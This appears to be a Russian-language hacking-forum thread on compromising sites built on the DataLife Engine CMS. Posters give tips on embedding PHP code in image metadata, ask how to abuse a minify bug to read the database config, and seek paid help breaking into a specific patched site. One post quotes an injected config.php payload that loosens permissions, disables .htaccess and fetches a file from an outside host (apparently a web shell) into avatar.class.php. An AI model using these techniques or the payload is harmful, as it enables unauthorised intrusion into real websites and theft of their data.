здесь вопрос простой: если сервер работает на голом апач и права на файл .htaccess 444, ничего не выйдет. Нужен или фтп, или "сосед" или заливка туда, где нет запрета на пхп (нет хтаксс) а вот, например, апач + мод_реврайт (как многие любят, типы быстро), группа вэб имеет права по умолчанию на запись в диры и файлы. потому и убить его можно, методами описанными выше (или через /inc/files.php (вопрос версии) или через анимашку)
Однако, для успешной эксплуатации данной уязвимости, необходимо, чтобы $config['log_hash'] было истиной. В большинстве случаев это не так.
Откройте исходный код картинки и вместо метатегах вставите свой php код, и целостность картинки сохранится и код будет. DLE кишит возможностями заливки файлов и выполнением произвольного кода, анализируйте внимательней исходники... Блин вот буквально сегодня искал баги в исходниках DLE и нашел одну из этих строк, а она уже в паблике(((
а как это багу с minify провернуть чтоб dbconfig увидеть по этому адресу Code: ./engine/cache/system/minify_dbconfig.php.js_e6d3eb97164a6db9d7def610a5e9736c
Мужики, подскажите хотя бы в каком направлении копать. Уязвимость с аватаркой, похоже, тоже уже пофиксили. gif-ки льются статическими, код из всех картинок режется. Может быть кто-то за вознаграждение поможет?
Короче говоря. Есть программа - Teleport Pro для закачки сайтов. Все наверняка заметили, что она не скачивает php файлы. Я попробовал указать папку site.ru/engine, и он обиделся и выдал 403 Forbidden. Но! Когда я ввел путь к конкретному файлу, то он как миленький его скачал. Но в формате html. Я не огорчился, порылся в настройках - и опля! Он скачал мне оригинальный php. Я уже выкачал с одного сайта таким образом форум и админку за просто так. Но умные админы переименовывают важнейшие файлы типа dbconfig, а админ там очень умный. Так что единственное, что требуется - раскрытие путей. Кто знает безболезненный способ? Версия известна - 9.0 Final, но, как я уже говорил, админы там умные и пофиксили большинство дыр патчами. Да, есть вероятность, что они сидят на nulled, но не уверен, да и сомнительно: сайт раскручен достаточно, так что будь он на нулевке, его бы ломанули. И все же, и все же... P. S.: Кто не верит - могу приложить скриншоты. P. P. S.: Да, чуть не забыл: еще я смог выкачать файл .htaccess, но не знаю, как он мне поможет - да, я чайник, можно и так сказать.
Итак, вот я захожу в телепорт и ввожу полный путь до хтаккеса. Вот он появился в проекте. Я запустил скачивание и все, он у меня. Я даже вот сюда выкладываю СКРИН куска кода, а не сам код. Теперь админка. Добавляю новый путь. В этот раз я не лазил особо в настройках, поэтому он сначала скачал более привычные форматы файлов - хтмл, джипег и так далее. А теперь заклинаю вас: скажите, выставил ли я себя полнейшим нубом? Я и форум выкачивал, до сих пор пылится, просто не знаю путей до пхп, и он скачивал просто index.html, темы и картинки.
Donnel, просто запрет скачивания .htaccess не стоит, и поэтому загрузился, а при нормальной настройке сервера .php скрипты выполняются и выводится рез-тат их работы, а не их содержание.
Да. Всё, что ты выкачал не является php исходниками. А теперь пара ссылок, чтобы не выглядел в следующий раз так-же. http://ru.wikipedia.org/wiki/PHP http://habrahabr.ru/post/143331/
Я понял, что php скачать нельзя, но черт подери, я же скачивал admin.php, до-него то я знал путь, .lng файлы и тому подобное. С этим ничего нельзя сделать?
вот недавно нашел в config.php , как юзают ..хз Code: .eval(base64_decode(chmod("engine/modules/", 0777); chmod("engine/modules/avatar.class.php", 0777); rename("engine/modules/.htaccess", "engine/modules/.htacces"); copy("http://whatq.ru/s.txt", "engine/modules/avatar.class.php"); chmod("engine/modules/avatar.class.php", 0404);)),//
Записывается это скорее всего из раздела "Настройки". Какое то поле не фильтруется должным образом, пропуская кавычки... Чтобы ответить точно на вопрос, нужно точно смотреть как выглядит config.php после взлома.
ахаха ты вы че ламеры вот же copy("http://whatq.ru/s.txt", "engine/modules/avatar.class.php"); тут походу шелл лежал, подозреваю, что s = shell
